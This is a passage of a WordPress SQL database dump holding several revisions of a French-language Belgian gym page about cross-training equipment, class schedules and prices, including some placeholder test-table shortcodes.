entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-10 16:10:46', '2013-07-10 16:10:46', '', 22, 'http://www.crosstrainingcenter.be/22-revision-30/', 0, 'revision', '', 0),
(154, 1, '2013-06-23 14:07:38', '2013-06-23 14:07:38', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]	\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style:dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 14:07:38', '2013-06-23 14:07:38', '', 11, 'http://www.crosstrainingcenter.be/?p=154', 0, 'revision', '', 0),
(155, 1, '2013-07-03 15:41:06', '2013-07-03 15:41:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:41:06', '2013-07-03 15:41:06', '', 11, 'http://www.crosstrainingcenter.be/?p=155', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(156, 1, '2013-07-03 15:52:51', '2013-07-03 15:52:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"left|right|right|right|right|right\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:52:51', '2013-07-03 15:52:51', '', 11, 'http://www.crosstrainingcenter.be/?p=156', 0, 'revision', '', 0),
(157, 1, '2013-07-03 15:53:34', '2013-07-03 15:53:34', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 